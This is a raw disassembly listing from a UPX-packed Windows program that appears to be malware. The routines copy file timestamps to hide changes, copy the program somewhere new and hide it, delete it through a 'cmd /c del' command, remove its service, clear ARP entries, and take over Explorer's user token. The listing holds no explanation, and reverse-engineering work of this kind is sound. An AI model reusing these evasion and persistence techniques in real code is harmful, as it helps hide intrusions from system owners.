loc_408D56: ; CODE XREF: UPX0:00408D40�j
mov esi, offset dword_427420
loc_408D5B: ; CODE XREF: UPX0:00408D91�j
cmp byte ptr [esi], 0
jz short loc_408D84
cmp dword ptr [ebp+14h], 0
jnz short loc_408D6F
cmp dword ptr [esi+208h], 0
jnz short loc_408D84
loc_408D6F: ; CODE XREF: UPX0:00408D64�j
push esi
push ebx
push offset aD_S ; "%d. %s"
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_40104B
add esp, 14h
loc_408D84: ; CODE XREF: UPX0:00408D5E�j
; UPX0:00408D6D�j
add esi, 220h
inc ebx
cmp esi, offset dword_46B420
jl short loc_408D5B
cmp dword ptr [ebp+10h], 0
jz short loc_408DAD
push edi
push offset aSEnd_ ; "%s End."
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_40104B
add esp, 10h
loc_408DAD: ; CODE XREF: UPX0:00408D97�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
db 20h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_408DD2 proc near ; CODE XREF: sub_4010AF�j
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_427624
loc_408DD9: ; CODE XREF: sub_408DD2+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_408DE2
inc eax
loc_408DE2: ; CODE XREF: sub_408DD2+D�j
add ecx, 220h
cmp ecx, offset dword_46B624
jl short loc_408DD9
retn
sub_408DD2 endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
sub_408DF8 proc near ; CODE XREF: sub_401226�j
arg_0 = dword ptr 4
xor eax, eax
push esi
xor edx, edx
mov ecx, offset dword_427624
loc_408E02: ; CODE XREF: sub_408DF8+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_408E1B
add ecx, 220h
inc edx
cmp ecx, offset dword_46B624
jl short loc_408E02
pop esi
retn
; ---------------------------------------------------------------------------
loc_408E1B: ; CODE XREF: sub_408DF8+10�j
mov eax, edx
pop esi
retn
sub_408DF8 endp
; ---------------------------------------------------------------------------
db 9 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E28 proc near ; CODE XREF: sub_4011A9�j
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
mov esi, ds:dword_47B5D0
push edi
mov edi, offset asc_4113B4 ; " "
push edi
push [ebp+arg_4]
call esi ; dword_47B5D0
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
push 1
mov [ecx], eax
pop eax
cmp [ebp+arg_8], eax
mov [ebp+arg_4], eax
jle short loc_408E70
push ebx
lea ebx, [ecx+4]
loc_408E54: ; CODE XREF: sub_408E28+45�j
push edi
push 0
call esi ; dword_47B5D0
pop ecx
mov [ebx], eax
test eax, eax
pop ecx
jz short loc_408E6F
inc [ebp+arg_4]
add ebx, 4
mov eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
jl short loc_408E54
loc_408E6F: ; CODE XREF: sub_408E28+37�j
pop ebx
loc_408E70: ; CODE XREF: sub_408E28+26�j
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebp
retn
sub_408E28 endp
; ---------------------------------------------------------------------------
db 13h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_408E8A proc near ; CODE XREF: sub_4011EF�j
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_47B49C ; GetFileAttributesA
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_408E8A endp
; ---------------------------------------------------------------------------
db 5 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408EA4 proc near ; CODE XREF: sub_4012B7�j
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
push edi
lea eax, [ebp+var_110]
push 104h
push eax
call ds:dword_47B490 ; GetWindowsDirectoryA
push 1
push offset aShell ; "Shell"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
push 80000002h
call sub_4010AA
xor ebx, ebx
add esp, 10h
cmp eax, ebx
jz short loc_408F5F
push eax
lea eax, [ebp+var_110]
push eax
call sub_40C29A ; strcat
pop ecx
mov esi, ds:dword_47B4C0
pop ecx
mov edi, 80h
push ebx
push edi
push 3
push ebx
push 1
lea eax, [ebp+var_110]
push 80000000h
push eax
call esi ; dword_47B4C0
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz short loc_408F5F
lea ecx, [ebp+var_C]
push ecx
push ebx
push ebx
push eax
call ds:dword_47B494 ; GetFileTime
push [ebp+var_4]
call ds:dword_47B520 ; CloseHandle
push ebx
push edi
push 3
push ebx
push 2
push 40000000h
push [ebp+arg_0]
call esi ; dword_47B4C0
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_408F5F
lea eax, [ebp+var_C]
push eax
push ebx
push ebx
push esi
call ds:dword_47B498 ; SetFileTime
push esi
call ds:dword_47B520 ; CloseHandle
push 1
pop eax
jmp short loc_408F61
; ---------------------------------------------------------------------------
loc_408F5F: ; CODE XREF: sub_408EA4+3B�j
; sub_408EA4+72�j ...
xor eax, eax
loc_408F61: ; CODE XREF: sub_408EA4+B9�j
pop edi
pop esi
pop ebx
leave
retn
sub_408EA4 endp
; ---------------------------------------------------------------------------
db 30h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408F96 proc near ; CODE XREF: sub_401302�j
var_30C = byte ptr -30Ch
var_208 = byte ptr -208h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 30Ch
push ebx
push esi
mov esi, 104h
lea eax, [ebp+var_208]
push esi
xor ebx, ebx
push eax
push ebx
call ds:dword_47B518 ; GetModuleHandleA
push eax
call ds:dword_47B510 ; GetModuleFileNameA
push [ebp+arg_4]
lea eax, [ebp+var_104]
push [ebp+arg_0]
push offset aSS ; "%s\\%s"
push esi
push eax
call ds:dword_47B620 ; _snprintf
lea eax, [ebp+var_208]
push eax
lea eax, [ebp+var_30C]
push eax
call sub_40C25E ; strcpy
add esp, 1Ch
lea eax, [ebp+var_30C]
push eax
call dword_413E08 ; PathRemoveFileSpecA
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_208]
push eax
call ds:dword_47B4E0 ; lstrcmpiA
test eax, eax
jz loc_4090B2
lea eax, [ebp+var_104]
push eax
call ds:dword_47B49C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_40903A
lea eax, [ebp+var_104]
push 80h
push eax
call ds:dword_47B4BC ; SetFileAttributesA
loc_40903A: ; CODE XREF: sub_408F96+90�j
mov esi, ds:dword_47B484
push edi
lea eax, [ebp+var_104]
push ebx
push eax
lea eax, [ebp+var_208]
push eax
loc_409050: ; CODE XREF: sub_408F96+F4�j
call esi ; dword_47B484
mov edi, eax
test edi, edi
jnz short loc_40908C
call ds:dword_47B4E4 ; RtlGetLastWin32Error
test ebx, ebx
jnz short loc_40908C
cmp eax, 20h
jz short loc_40906C
cmp eax, 5
jnz short loc_40908C
loc_40906C: ; CODE XREF: sub_408F96+CF�j
push 1
pop ebx
push 3A98h
call ds:dword_47B4EC ; Sleep
lea eax, [ebp+var_104]
push 0
push eax
lea eax, [ebp+var_208]
push eax
jmp short loc_409050
; ---------------------------------------------------------------------------
loc_40908C: ; CODE XREF: sub_408F96+C0�j
; sub_408F96+CA�j ...
lea eax, [ebp+var_104]
push eax
call sub_4012B7
pop ecx
lea eax, [ebp+var_104]
push 7
push eax
call ds:dword_47B4BC ; SetFileAttributesA
test edi, edi
pop edi
jz short loc_4090B2
push 1
pop eax
jmp short loc_4090B4
; ---------------------------------------------------------------------------
loc_4090B2: ; CODE XREF: sub_408F96+7A�j
; sub_408F96+115�j
xor eax, eax
loc_4090B4: ; CODE XREF: sub_408F96+11A�j
pop esi
pop ebx
leave
retn
sub_408F96 endp
; ---------------------------------------------------------------------------
db 48h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_409100 proc near ; CODE XREF: sub_4010FF�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 40h
mov edx, offset dword_478DF0
pop ecx
xor eax, eax
mov edi, edx
rep stosd
mov eax, [esp+4+arg_4]
pop edi
cmp eax, [esp+arg_8]
jg short loc_409131
push esi
mov esi, edx
sub esi, eax
loc_40911F: ; CODE XREF: sub_409100+2E�j
mov ecx, [esp+4+arg_0]
mov cl, [eax+ecx]
mov [esi+eax], cl
inc eax
cmp eax, [esp+4+arg_8]
jle short loc_40911F
pop esi
loc_409131: ; CODE XREF: sub_409100+18�j
mov eax, edx
retn
sub_409100 endp
; ---------------------------------------------------------------------------
db 0Dh dup(0CCh)
; ---------------------------------------------------------------------------
loc_409141: ; CODE XREF: UPX0:004010F0�j
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+8]
xor esi, esi
cmp edi, esi
jz loc_4091D5
mov eax, [ebp+0Ch]
cmp eax, esi
jz short loc_4091D5
cmp [ebp+10h], esi
jz short loc_4091D5
cmp byte ptr [eax], 0
jz short loc_4091D5
push ebx
push edi
call ds:dword_47B634 ; _strdup
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_4091D0
push dword ptr [ebp+0Ch]
push edi
call ds:dword_47B610 ; strstr
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_4091C8
sub eax, edi
push eax
push edi
push ebx
call ds:dword_47B614 ; strncpy
push dword ptr [ebp+10h]
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call sub_40C28E ; strlen
push eax
push dword ptr [ebp+10h]
push ebx
call ds:dword_47B5C4 ; strncat
push dword ptr [ebp+0Ch]
call sub_40C28E ; strlen
add eax, esi
push eax
push ebx
call sub_40C29A ; strcat
push ebx
push edi
call sub_40C25E ; strcpy
add esp, 30h
mov esi, edi
loc_4091C8: ; CODE XREF: UPX0:00409183�j
push ebx
call ds:dword_47B5E4 ; free
pop ecx
loc_4091D0: ; CODE XREF: UPX0:00409171�j
mov eax, esi
pop ebx
jmp short loc_4091D7
; ---------------------------------------------------------------------------
loc_4091D5: ; CODE XREF: UPX0:0040914D�j
; UPX0:00409158�j ...
xor eax, eax
loc_4091D7: ; CODE XREF: UPX0:004091D3�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
db 26h dup(0CCh)
; ---------------------------------------------------------------------------
loc_409201: ; CODE XREF: UPX0:00401082�j
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+8]
push edi
xor edi, edi
push 1
mov ecx, [edx]
and [ebp-8], edi
pop eax
cmp byte ptr [ecx], 21h
mov [ebp-4], eax
jnz short loc_409222
inc ecx
mov [ebp-8], eax
mov [edx], ecx
loc_409222: ; CODE XREF: UPX0:0040921A�j
push ebx
push esi
loc_409224: ; CODE XREF: UPX0:0040927C�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_409232
cmp [ebp-4], eax
jnz short loc_40927E
loc_409232: ; CODE XREF: UPX0:0040922B�j
test edi, edi
jnz short loc_409273
cmp bl, 2Dh
jnz short loc_409267
mov al, [ecx+1]
lea esi, [ecx+1]
mov cl, [ecx-1]
cmp cl, al
jge short loc_409267
cmp al, 5Dh
jz short loc_409267
cmp [ebp-4], edi
jnz short loc_409267
mov ebx, [ebp+0Ch]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_409273
cmp bl, al
jg short loc_409273
push 1
mov [edx], esi
pop edi
jmp short loc_409273
; ---------------------------------------------------------------------------
loc_409267: ; CODE XREF: UPX0:00409239�j
; UPX0:00409246�j ...
mov eax, [ebp+0Ch]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_409273
push 1
pop edi
loc_409273: ; CODE XREF: UPX0:00409234�j
; UPX0:0040925A�j ...
inc dword ptr [edx]
and dword ptr [ebp-4], 0
push 1
pop eax
jmp short loc_409224
; ---------------------------------------------------------------------------
loc_40927E: ; CODE XREF: UPX0:00409230�j
cmp [ebp-8], eax
pop esi
pop ebx
jnz short loc_40928B
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_40928B: ; CODE XREF: UPX0:00409283�j
cmp edi, eax
jnz short loc_409294
mov eax, [ebp+0Ch]
inc dword ptr [eax]
loc_409294: ; CODE XREF: UPX0:0040928D�j
mov eax, edi
pop edi
leave
retn
; ---------------------------------------------------------------------------
db 26h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4092BF proc near ; CODE XREF: sub_401230�j
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
xor ebx, ebx
loc_4092DB: ; CODE XREF: sub_4092BF+3A�j
cmp [eax], bl
jz short loc_4092FB
mov cl, [ecx]
cmp cl, 3Fh
jz short loc_4092F0
cmp cl, 2Ah
jnz short loc_4092FB
cmp cl, 3Fh
jnz short loc_4092F3
loc_4092F0: ; CODE XREF: sub_4092BF+25�j
inc eax
mov [edi], eax
loc_4092F3: ; CODE XREF: sub_4092BF+2F�j
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
jmp short loc_4092DB
; ---------------------------------------------------------------------------
loc_4092FB: ; CODE XREF: sub_4092BF+1E�j
; sub_4092BF+2A�j ...
mov eax, [esi]
cmp byte ptr [eax], 2Ah
jnz short loc_409306
inc dword ptr [esi]
jmp short loc_4092FB
; ---------------------------------------------------------------------------
loc_409306: ; CODE XREF: sub_4092BF+41�j
mov eax, [edi]
mov cl, [eax]
cmp cl, bl
jnz short loc_409327
mov edx, [esi]
cmp [edx], bl
jz short loc_409318
xor eax, eax
jmp short loc_409387
; ---------------------------------------------------------------------------
loc_409318: ; CODE XREF: sub_4092BF+53�j
cmp cl, bl
jnz short loc_409327
mov ecx, [esi]
cmp [ecx], bl
jnz short loc_409327
push 1
pop eax
jmp short loc_409387
; ---------------------------------------------------------------------------
loc_409327: ; CODE XREF: sub_4092BF+4D�j
; sub_4092BF+5B�j ...
push eax
push dword ptr [esi]
call sub_4010D2
pop ecx
test eax, eax
pop ecx
jnz short loc_409371
loc_409335: ; CODE XREF: sub_4092BF+B0�j
inc dword ptr [edi]
mov eax, [edi]
loc_409339: ; CODE XREF: sub_4092BF+90�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jz short loc_409351
cmp cl, 5Bh
jz short loc_409351
cmp dl, bl
jz short loc_409351
inc eax
mov [edi], eax
jmp short loc_409339
; ---------------------------------------------------------------------------
loc_409351: ; CODE XREF: sub_4092BF+82�j
; sub_4092BF+87�j ...
mov eax, [edi]
cmp [eax], bl
jz short loc_409368
push eax
push dword ptr [esi]
call sub_4010D2
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40936D
; ---------------------------------------------------------------------------
loc_409368: ; CODE XREF: sub_4092BF+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_40936D: ; CODE XREF: sub_4092BF+A7�j
cmp eax, ebx
jnz short loc_409335
loc_409371: ; CODE XREF: sub_4092BF+74�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_409384
mov eax, [esi]
cmp [eax], bl
jnz short loc_409384
mov [ebp+var_4], 1
loc_409384: ; CODE XREF: sub_4092BF+B6�j
; sub_4092BF+BC�j
mov eax, [ebp+var_4]
loc_409387: ; CODE XREF: sub_4092BF+57�j
; sub_4092BF+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_4092BF endp
; ---------------------------------------------------------------------------
db 33h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4093BF proc near ; CODE XREF: sub_4010D2�j
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push 1
pop eax
loc_4093C9: ; CODE XREF: sub_4093BF+4B�j
mov cl, [esi]
test cl, cl
jz short loc_40940C
cmp eax, 1
jnz short loc_40940C
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_40940C
cmp cl, 2Ah
jz short loc_4093F3
cmp cl, 3Fh
jz short loc_4093EE
xor eax, eax
cmp cl, dl
setz al
loc_4093EE: ; CODE XREF: sub_4093BF+26�j
inc [ebp+arg_4]
jmp short loc_409406
; ---------------------------------------------------------------------------
loc_4093F3: ; CODE XREF: sub_4093BF+21�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_401230
mov esi, [ebp+arg_0]
pop ecx
pop ecx
dec esi
loc_409406: ; CODE XREF: sub_4093BF+32�j
inc esi
mov [ebp+arg_0], esi
jmp short loc_4093C9
; ---------------------------------------------------------------------------
loc_40940C: ; CODE XREF: sub_4093BF+E�j
; sub_4093BF+13�j ...
cmp byte ptr [esi], 2Ah
jnz short loc_40941C
cmp eax, 1
jnz short loc_409433
inc esi
mov [ebp+arg_0], esi
jmp short loc_40940C
; ---------------------------------------------------------------------------
loc_40941C: ; CODE XREF: sub_4093BF+50�j
cmp eax, 1
jnz short loc_409433
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_409433
cmp byte ptr [esi], 0
jnz short loc_409433
push 1
pop eax
jmp short loc_409435
; ---------------------------------------------------------------------------
loc_409433: ; CODE XREF: sub_4093BF+55�j
; sub_4093BF+60�j ...
xor eax, eax
loc_409435: ; CODE XREF: sub_4093BF+72�j
pop esi
pop ebp
retn
sub_4093BF endp
; ---------------------------------------------------------------------------
db 1Eh dup(0CCh)
; ---------------------------------------------------------------------------
loc_409456: ; CODE XREF: sub_401091�j
push ebp
mov ebp, esp
sub esp, 348h
push ebx
and byte ptr [ebp-140h], 0
push esi
push edi
push 40h
xor eax, eax
pop ebx
lea edi, [ebp-13Fh]
mov ecx, ebx
and byte ptr [ebp-348h], 0
rep stosd
stosw
stosb
mov ecx, ebx
xor eax, eax
lea edi, [ebp-347h]
and byte ptr [ebp-244h], 0
rep stosd
stosw
stosb
mov ecx, ebx
xor eax, eax
lea edi, [ebp-243h]
mov esi, 104h
rep stosd
stosw
stosb
lea eax, [ebp-140h]
push esi
push eax
push 0
call ds:dword_47B510 ; GetModuleFileNameA
test eax, eax
jz loc_4095ED
lea eax, [ebp-140h]
push esi
push eax
lea eax, [ebp-140h]
push eax
call ds:dword_47B470 ; GetShortPathNameA
test eax, eax
jz loc_4095ED
lea eax, [ebp-348h]
push esi
push eax
push offset aComspec ; "COMSPEC"
call ds:dword_47B474 ; GetEnvironmentVariableA
test eax, eax
jz loc_4095ED
lea eax, [ebp-140h]
push 80h
push eax
call ds:dword_47B4BC ; SetFileAttributesA
dec esi
lea eax, [ebp-244h]
push esi
push offset aCDel ; "/c del "
push eax
call ds:dword_47B614 ; strncpy
mov edi, ds:dword_47B5C4
lea eax, [ebp-140h]
push esi
push eax
lea eax, [ebp-244h]
push eax
call edi ; dword_47B5C4
push esi
lea eax, [ebp-244h]
push offset aNul ; " > nul"
push eax
call edi ; dword_47B5C4
mov edi, ds:dword_47B504
lea ecx, [ebp-348h]
add esp, 24h
mov [ebp-2Ch], ecx
xor eax, eax
lea ecx, [ebp-244h]
push 100h
mov dword ptr [ebp-3Ch], 3Ch
mov [ebp-34h], eax
mov dword ptr [ebp-30h], offset aOpen ; "Open"
mov [ebp-28h], ecx
mov [ebp-24h], eax
mov [ebp-20h], eax
mov [ebp-38h], ebx
call edi ; dword_47B504
mov esi, ds:dword_47B478
push eax
call esi ; dword_47B478
mov ebx, ds:dword_47B50C
push 0Fh
call ebx ; dword_47B50C
push eax
call ds:dword_47B47C ; SetThreadPriority
lea eax, [ebp-3Ch]
push eax
call ds:dword_47B688
test eax, eax
jz short loc_4095DB
push 40h
push dword ptr [ebp-4]
call esi ; dword_47B478
push 1
push dword ptr [ebp-4]
call ds:dword_47B480 ; SetProcessPriorityBoost
lea eax, [ebp-140h]
push 0
push eax
push 1
push 4
call ds:dword_47B68C
push 1
call ds:dword_47B514 ; ExitProcess
loc_4095DB: ; CODE XREF: UPX0:004095AC�j
push 20h
call edi ; dword_47B504
push eax
call esi ; dword_47B478
push 0
call ebx ; dword_47B50C
push eax
call ds:dword_47B47C ; SetThreadPriority
loc_4095ED: ; CODE XREF: UPX0:004094BE�j
; UPX0:004094DB�j ...
push 1
call ds:dword_47B514 ; ExitProcess
; ---------------------------------------------------------------------------
db 67h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40965C proc near ; CODE XREF: sub_4012C1�j
arg_0 = dword ptr 4
push 0F003Fh
push 0
push 0
call dword_413E84 ; OpenSCManagerA
push 0F01FFh
push offset dword_40FBB0
push eax
call dword_413D2C ; OpenServiceA
push eax
call dword_413DB4 ; DeleteService
push dword_4138D4
call ds:dword_47B4B8 ; ReleaseMutex
cmp [esp+arg_0], 0
jnz short locret_4096A0
call sub_4010CD
jmp sub_401091
; ---------------------------------------------------------------------------
locret_4096A0: ; CODE XREF: sub_40965C+38�j
retn
sub_40965C endp
; ---------------------------------------------------------------------------
db 11h dup(0CCh)
; ---------------------------------------------------------------------------
loc_4096B2: ; CODE XREF: UPX0:0040126C�j
push ebp
mov ebp, esp
sub esp, 38h
and dword ptr [ebp-4], 0
push ebx
push esi
push edi
push 32h
mov edi, offset dword_478DBC
push 0
push edi
call sub_40C294 ; memset
mov ebx, [ebp+8]
add esp, 0Ch
lea esi, [ebp-38h]
loc_4096D7: ; CODE XREF: UPX0:0040970D�j
; UPX0:00409713�j
push 0
push 0Ah
push dword ptr [ebp+0Ch]
push ebx
call sub_40C490
push 0
push 0Ah
push dword ptr [ebp+0Ch]
add al, 30h
mov [esi], al
inc esi
push ebx
call sub_40C420
mov ebx, eax
or eax, edx
mov [ebp+0Ch], edx
jz short loc_409715
inc dword ptr [ebp-4]
push 3
mov eax, [ebp-4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_4096D7
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_4096D7
; ---------------------------------------------------------------------------
loc_409715: ; CODE XREF: UPX0:004096FD�j
dec esi
mov eax, edi
loc_409718: ; CODE XREF: UPX0:00409725�j
lea ecx, [ebp-38h]
cmp esi, ecx
jb short loc_409727
mov cl, [esi]
mov [eax], cl
inc eax
dec esi
jmp short loc_409718
; ---------------------------------------------------------------------------
loc_409727: ; CODE XREF: UPX0:0040971D�j
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
db 1Fh dup(0CCh)
; ---------------------------------------------------------------------------
loc_409750: ; CODE XREF: UPX0:00401118�j
push ebp
mov ebp, esp
sub esp, 38h
and dword ptr [ebp-4], 0
push ebx
mov ebx, [ebp+0Ch]
push esi
push edi
mov edi, [ebp+8]
lea esi, [ebp-38h]
loc_409766: ; CODE XREF: UPX0:00409797�j
; UPX0:0040979D�j
push 0
push 0Ah
push ebx
push edi
call sub_40C490
push 0
add al, 30h
push 0Ah
push ebx
mov [esi], al
push edi
inc esi
call sub_40C420
mov ebx, edx
mov edi, eax
or eax, ebx
jz short loc_40979F
inc dword ptr [ebp-4]
push 3
mov eax, [ebp-4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_409766
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_409766
; ---------------------------------------------------------------------------
loc_40979F: ; CODE XREF: UPX0:00409787�j
mov eax, [ebp+10h]
dec esi
loc_4097A3: ; CODE XREF: UPX0:004097B0�j
lea ecx, [ebp-38h]
cmp esi, ecx
jb short loc_4097B2
mov cl, [esi]
mov [eax], cl
inc eax
dec esi
jmp short loc_4097A3
; ---------------------------------------------------------------------------
loc_4097B2: ; CODE XREF: UPX0:004097A8�j
and byte ptr [eax], 0
mov eax, [ebp+10h]
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
db 1Bh dup(0CCh)
; ---------------------------------------------------------------------------
loc_4097D8: ; CODE XREF: UPX0:00401096�j
mov ecx, dword_413D78
xor eax, eax
test ecx, ecx
jz short locret_4097E6
call ecx ; dword_413D78
locret_4097E6: ; CODE XREF: UPX0:004097E2�j
retn
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
; ---------------------------------------------------------------------------
loc_4097EA: ; CODE XREF: UPX0:00401019�j
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
push 1
pop ebx
lea eax, [ebp-8]
xor edi, edi
push ebx
push eax
push edi
xor esi, esi
mov [ebp-8], edi
mov [ebp-4], ebx
call dword_413F38 ; GetIpNetTable
sub eax, edi
jz short loc_40984F
sub eax, 32h
jz short loc_40984A
sub eax, 48h
jz short loc_40981E
sub eax, 6Eh
jmp short loc_40984A
; ---------------------------------------------------------------------------
loc_40981E: ; CODE XREF: UPX0:00409817�j
push dword ptr [ebp-8]
call ds:dword_47B5DC ; malloc
push dword ptr [ebp-8]
mov esi, eax
push edi
push esi
call sub_40C294 ; memset
add esp, 10h
cmp esi, edi
jz short loc_40984A
lea eax, [ebp-8]
push ebx
push eax
push esi
call dword_413F38 ; GetIpNetTable
test eax, eax
jz short loc_40984F
loc_40984A: ; CODE XREF: UPX0:00409812�j
; UPX0:0040981C�j ...
mov [ebp-4], edi
jmp short loc_409865
; ---------------------------------------------------------------------------
loc_40984F: ; CODE XREF: UPX0:0040980D�j
; UPX0:00409848�j
cmp [esi], edi
jbe short loc_409865
lea ebx, [esi+4]
loc_409856: ; CODE XREF: UPX0:00409863�j
push ebx
call dword_413F34 ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_409856
loc_409865: ; CODE XREF: UPX0:0040984D�j
; UPX0:00409851�j
push esi
call ds:dword_47B5E4 ; free
mov eax, [ebp-4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
db 22h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409897 proc near ; CODE XREF: sub_401163�j
var_1110 = dword ptr -1110h
var_110 = byte ptr -110h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 1110h
call sub_40C3E0
push ebx
push esi
lea eax, [ebp+var_8]
push edi
push eax
lea eax, [ebp+var_1110]
push 1000h
push eax
call dword_413E90
test eax, eax
jz loc_40994E
mov esi, [ebp+var_8]
mov [ebp+var_4], 0
shr esi, 2
jz short loc_40994E
lea edi, [ebp+var_1110]
loc_4098DA: ; CODE XREF: sub_409897+B5�j
lea eax, [ebp+var_110]
push offset aUnknown ; "unknown"
push eax
call sub_40C25E ; strcpy
pop ecx
pop ecx
push dword ptr [edi]
push 0
push 411h
call ds:dword_47B4F0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jz short loc_409943
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push 4
push eax
push ebx
call dword_413E44
test eax, eax
jz short loc_409943
lea eax, [ebp+var_110]
push 104h
push eax
push [ebp+var_C]
push ebx
call dword_413D84
lea eax, [ebp+var_110]
push eax
push offset aExplorer_exe ; "Explorer.exe"
call ds:dword_47B4E0 ; lstrcmpiA
test eax, eax
jz short loc_409955
loc_409943: ; CODE XREF: sub_409897+69�j
; sub_409897+7E�j
inc [ebp+var_4]
add edi, 4
cmp [ebp+var_4], esi
jb short loc_4098DA
loc_40994E: ; CODE XREF: sub_409897+28�j
; sub_409897+3B�j
xor eax, eax
loc_409950: ; CODE XREF: sub_409897+C8�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_409955: ; CODE XREF: sub_409897+AA�j
mov eax, [ebp+var_4]
mov eax, [ebp+eax*4+var_1110]
jmp short loc_409950
sub_409897 endp
; ---------------------------------------------------------------------------
db 32h dup(0CCh)
; ---------------------------------------------------------------------------
loc_409993: ; CODE XREF: UPX0:00401154�j
push ebp
mov ebp, esp
push ecx
and dword ptr [ebp-4], 0
push edi
call sub_401163
test eax, eax
jz short loc_4099E3
push eax
push 1
push 1F0FFFh
call ds:dword_47B4F0 ; OpenProcess
mov edi, eax
test edi, edi
jz short loc_4099E3
lea eax, [ebp-4]
push esi
push eax
push 0Ah
push edi
call dword_413E70 ; OpenProcessToken
mov esi, ds:dword_47B520
test eax, eax
jz short loc_4099DF
push dword ptr [ebp-4]
call dword_413F78 ; ImpersonateLoggedOnUser
push dword ptr [ebp-4]
call esi ; dword_47B520
loc_4099DF: ; CODE XREF: UPX0:004099CF�j
push edi
call esi ; dword_47B520
pop esi
loc_4099E3: ; CODE XREF: UPX0:004099A3�j
; UPX0:004099B7�j
pop edi
leave
retn
; ---------------------------------------------------------------------------
db 14h dup(0CCh)
; ---------------------------------------------------------------------------
loc_4099FA: ; CODE XREF: UPX0:0040119A�j
push ebp
mov ebp, esp
sub esp, 178h
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp-0Ch], ebx
call dword_413E84 ; OpenSCManagerA
mov [ebp-4], eax
loc_409A1B: ; CODE XREF: UPX0:00409A7C�j
lea eax, [ebp-0Ch]
push eax
lea eax, [ebp-8]
push eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-178h]
push 168h
push eax
push 3
push 30h
push dword ptr [ebp-4]
call dword_413E38 ; EnumServicesStatusA
test eax, eax
